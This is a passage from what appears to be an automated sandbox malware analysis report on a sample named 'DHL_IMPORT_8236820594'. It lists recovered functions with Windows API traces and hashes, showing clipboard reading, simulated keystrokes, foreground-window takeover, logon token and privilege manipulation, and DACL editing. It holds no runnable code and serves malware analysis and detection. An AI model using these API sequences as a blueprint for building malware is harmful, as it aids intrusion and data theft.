                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                          • Instruction ID: 172d13c0d88e2bd1e3c5ed467e234763476cd620020adebdac059e6b90c9bad8
                                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                          • Instruction Fuzzy Hash: 83E0BF7494010DEFDB00EFA8D5496DE7BB8EF04711F1005A1FD05E7681DB309E548A62
                                                                                          Function 007D6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CloseHandle.KERNELBASE(?,?,00000000,008124E0), ref: 007D6266
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 0b9a3c1d00f2e9938695669c52fdd61b42d8110f6828669126f4b60a13cb9dda
                                                                                          • Instruction ID: fd7919276b426e54e0a76aeac946b48ad22bbc7e603e44dec8f2b1c66108ec44
                                                                                          • Opcode Fuzzy Hash: 0b9a3c1d00f2e9938695669c52fdd61b42d8110f6828669126f4b60a13cb9dda
                                                                                          • Instruction Fuzzy Hash: 91E09975800B01CEC3318F1AE804422FBF9FEE13613218A2FD0E692668D3B4688A8B50
                                                                                          Function 03ABC140 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03ABC151
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1850341906.0000000003AB9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03AB9000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3ab9000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction ID: e3ec2d84062ddd449cb3bc911ad6423c6deb0e57f421ffdd2aa66b6b76f8a3f2
                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                          • Instruction Fuzzy Hash: 57E0E67494010DDFDB00EFB8D5496DE7FB4EF04701F1001A1FD01E2281D6309D508A62

                                                                                          Non-executed Functions

                                                                                          Function 00869576 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0086961A
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0086965B
                                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0086969F
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008696C9
                                                                                          • SendMessageW.USER32 ref: 008696F2
                                                                                          • GetKeyState.USER32(00000011), ref: 0086978B
                                                                                          • GetKeyState.USER32(00000009), ref: 00869798
                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008697AE
                                                                                          • GetKeyState.USER32(00000010), ref: 008697B8
                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008697E9
                                                                                          • SendMessageW.USER32 ref: 00869810
                                                                                          • SendMessageW.USER32(?,00001030,?,00867E95), ref: 00869918
                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0086992E
                                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00869941
                                                                                          • SetCapture.USER32(?), ref: 0086994A
                                                                                          • ClientToScreen.USER32(?,?), ref: 008699AF
                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008699BC
                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008699D6
                                                                                          • ReleaseCapture.USER32 ref: 008699E1
                                                                                          • GetCursorPos.USER32(?), ref: 00869A19
                                                                                          • ScreenToClient.USER32(?,?), ref: 00869A26
                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00869A80
                                                                                          • SendMessageW.USER32 ref: 00869AAE
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00869AEB
                                                                                          • SendMessageW.USER32 ref: 00869B1A
                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00869B3B
                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00869B4A
                                                                                          • GetCursorPos.USER32(?), ref: 00869B68
                                                                                          • ScreenToClient.USER32(?,?), ref: 00869B75
                                                                                          • GetParent.USER32(?), ref: 00869B93
                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00869BFA
                                                                                          • SendMessageW.USER32 ref: 00869C2B
                                                                                          • ClientToScreen.USER32(?,?), ref: 00869C84
                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00869CB4
                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00869CDE
                                                                                          • SendMessageW.USER32 ref: 00869D01
                                                                                          • ClientToScreen.USER32(?,?), ref: 00869D4E
                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00869D82
                                                                                            • Part of subcall function 007E9944: GetWindowLongW.USER32(?,000000EB), ref: 007E9952
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00869E05
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                          • String ID: @GUI_DRAGID$F
                                                                                          • API String ID: 3429851547-4164748364
                                                                                          • Opcode ID: 5cf5d8492e02e3d0b7bc200b4e294be61fbe6a9825391d670e43a56248ee2540
                                                                                          • Instruction ID: c525c95453595bd94f38b1f4602081a2d2b42d793b4bab554a3914b5922c0598
                                                                                          • Opcode Fuzzy Hash: 5cf5d8492e02e3d0b7bc200b4e294be61fbe6a9825391d670e43a56248ee2540
                                                                                          • Instruction Fuzzy Hash: B8428A34204301AFDB25CF68CC48AAABBE9FF59314F16061DF699C72E1E771A854CB52
                                                                                          Function 00864873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008648F3
                                                                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00864908
                                                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00864927
                                                                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0086494B
                                                                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0086495C
                                                                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0086497B
                                                                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008649AE
                                                                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008649D4
                                                                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00864A0F
                                                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00864A56
                                                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00864A7E
                                                                                          • IsMenu.USER32(?), ref: 00864A97
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00864AF2
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00864B20
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00864B94
                                                                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00864BE3
                                                                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00864C82
                                                                                          • wsprintfW.USER32 ref: 00864CAE
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00864CC9
                                                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00864CF1
                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00864D13
                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00864D33
                                                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00864D5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                          • String ID: %d/%02d/%02d
                                                                                          • API String ID: 4054740463-328681919
                                                                                          • Opcode ID: 0b41424236ada983d01f0e288ce0cbe4cdee53e3e6d960c63bc41b06f0dcc607
                                                                                          • Instruction ID: a0cf3361160af4ead32918ef43f68584f96086cbe01a235896d4715168894324
                                                                                          • Opcode Fuzzy Hash: 0b41424236ada983d01f0e288ce0cbe4cdee53e3e6d960c63bc41b06f0dcc607
                                                                                          • Instruction Fuzzy Hash: F512FD71600258ABEB248F28DC49FBE7BB8FF45714F115129F616EB2A1DBB89940CB50
                                                                                          Function 007EF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 007EF998
                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0082F474
                                                                                          • IsIconic.USER32(00000000), ref: 0082F47D
                                                                                          • ShowWindow.USER32(00000000,00000009), ref: 0082F48A
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0082F494
                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082F4AA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0082F4B1
                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082F4BD
                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4CE
                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0082F4D6
                                                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0082F4DE
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0082F4E1
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F4F6
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F501
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F50B
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F510
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F519
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F51E
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0082F528
                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0082F52D
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0082F530
                                                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0082F557
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 4125248594-2988720461
                                                                                          • Opcode ID: 85dc9e210a237490d7d088821b3cf2ac5aecf243287252221f9d6ebd0e1450f1
                                                                                          • Instruction ID: 5646bfa8be6ade8438d342914d56a947a78c19cf88c1d8b0aa9b6ac715d27a96
                                                                                          • Opcode Fuzzy Hash: 85dc9e210a237490d7d088821b3cf2ac5aecf243287252221f9d6ebd0e1450f1
                                                                                          • Instruction Fuzzy Hash: EA315071A40228BAEB206FB5AC4AFBF7E7CFB44B50F111026F741E61D1C6F15940EA64
                                                                                          Function 00831201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 008316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
                                                                                            • Part of subcall function 008316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
                                                                                            • Part of subcall function 008316C3: GetLastError.KERNEL32 ref: 0083174A
                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00831286
                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 008312A8
                                                                                          • CloseHandle.KERNEL32(?), ref: 008312B9
                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008312D1
                                                                                          • GetProcessWindowStation.USER32 ref: 008312EA
                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 008312F4
                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00831310
                                                                                            • Part of subcall function 008310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008311FC), ref: 008310D4
                                                                                            • Part of subcall function 008310BF: CloseHandle.KERNEL32(?,?,008311FC), ref: 008310E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                          • String ID: $default$winsta0
                                                                                          • API String ID: 22674027-1027155976
                                                                                          • Opcode ID: b359a7350ac231458a59beee5a3fbbc59399dc712414c7d458098b191f29a815
                                                                                          • Instruction ID: f4aeaafb53e7152c4d48de5faca211e36b1a79760e791d071b173e7925fb953f
                                                                                          • Opcode Fuzzy Hash: b359a7350ac231458a59beee5a3fbbc59399dc712414c7d458098b191f29a815
                                                                                          • Instruction Fuzzy Hash: B9818B71900208ABDF219FA8DC49FFE7BBAFF44B04F144129F910E62A0CB758944CBA5
                                                                                          Function 00830B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00831114
                                                                                            • Part of subcall function 008310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831120
                                                                                            • Part of subcall function 008310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 0083112F
                                                                                            • Part of subcall function 008310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00830B9B,?,?,?), ref: 00831136
                                                                                            • Part of subcall function 008310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0083114D
                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00830BCC
                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00830C00
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00830C17
                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00830C51
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00830C6D
                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00830C84
                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00830C8C
                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00830C93
                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00830CB4
                                                                                          • CopySid.ADVAPI32(00000000), ref: 00830CBB
                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00830CEA
                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00830D0C
                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00830D1E
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D45
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D4C
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D55
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D5C
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00830D65
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D6C
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00830D78
                                                                                          • HeapFree.KERNEL32(00000000), ref: 00830D7F
                                                                                            • Part of subcall function 00831193: GetProcessHeap.KERNEL32(00000008,00830BB1,?,00000000,?,00830BB1,?), ref: 008311A1
                                                                                            • Part of subcall function 00831193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00830BB1,?), ref: 008311A8
                                                                                            • Part of subcall function 00831193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00830BB1,?), ref: 008311B7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                          • String ID:
                                                                                          • API String ID: 4175595110-0
                                                                                          • Opcode ID: 189830ae4e3f93e2bc00f66dda449f318b842e5ea8e7ee2e5e0925f3c8c0d53a
                                                                                          • Instruction ID: 103724a3d66a339885514939d7bf3c3650fb586e437dead000d8927085f89a01
                                                                                          • Opcode Fuzzy Hash: 189830ae4e3f93e2bc00f66dda449f318b842e5ea8e7ee2e5e0925f3c8c0d53a
                                                                                          • Instruction Fuzzy Hash: 57715A7290020AABEF10DFA4DC48FAEBBB8FF45300F154655E954E6291D7B5AA05CFA0
                                                                                          Function 0084EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(0086CC08), ref: 0084EB29
                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0084EB37
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0084EB43
                                                                                          • CloseClipboard.USER32 ref: 0084EB4F
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0084EB87
                                                                                          • CloseClipboard.USER32 ref: 0084EB91
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0084EBBC
                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0084EBC9
                                                                                          • GetClipboardData.USER32(00000001), ref: 0084EBD1
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0084EBE2
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0084EC22
                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0084EC38
                                                                                          • GetClipboardData.USER32(0000000F), ref: 0084EC44
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0084EC55
                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0084EC77
                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0084EC94
                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0084ECD2
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0084ECF3
                                                                                          • CountClipboardFormats.USER32 ref: 0084ED14
                                                                                          • CloseClipboard.USER32 ref: 0084ED59
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                          • String ID:
                                                                                          • API String ID: 420908878-0
                                                                                          • Opcode ID: c307bd9fd2b2a9e14e6335f89a991c583018d0dd86b0e74d8d6cbed36dc3219f
                                                                                          • Instruction ID: b53426ed74e5f0e362524acd96c97f46003d66edc4e43e3e1fb128cf9128fe74
                                                                                          • Opcode Fuzzy Hash: c307bd9fd2b2a9e14e6335f89a991c583018d0dd86b0e74d8d6cbed36dc3219f
                                                                                          • Instruction Fuzzy Hash: 5D61AB34204209AFD300EF24D898F3AB7A4FF84714F15551EF896D72A2CB71E905CBA2
                                                                                          Function 0084698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 008469BE
                                                                                          • FindClose.KERNEL32(00000000), ref: 00846A12
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00846A4E
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00846A75
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00846AB2
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00846ADF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                          • API String ID: 3830820486-3289030164
                                                                                          • Opcode ID: 7f1afa8cea24b9b2c8d54c586ab7ee9df8e14a7ed158f60d5b8d9ca6d9b76430
                                                                                          • Instruction ID: d82306a28d6926f72862be9a9677258fa18c941fff84799aa02ae6e91d051ac6
                                                                                          • Opcode Fuzzy Hash: 7f1afa8cea24b9b2c8d54c586ab7ee9df8e14a7ed158f60d5b8d9ca6d9b76430
                                                                                          • Instruction Fuzzy Hash: 0ED150B2508344AEC714EBA4C895EABB7FCFF88704F44491EF585D6291EB78DA04C762
                                                                                          Function 00849642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00849663
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 008496A1
                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 008496BB
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 008496D3
                                                                                          • FindClose.KERNEL32(00000000), ref: 008496DE
                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 008496FA
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0084974A
                                                                                          • SetCurrentDirectoryW.KERNEL32(00896B7C), ref: 00849768
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00849772
                                                                                          • FindClose.KERNEL32(00000000), ref: 0084977F
                                                                                          • FindClose.KERNEL32(00000000), ref: 0084978F
                                                                                          Strings
                                                                                          Memory Dump Source
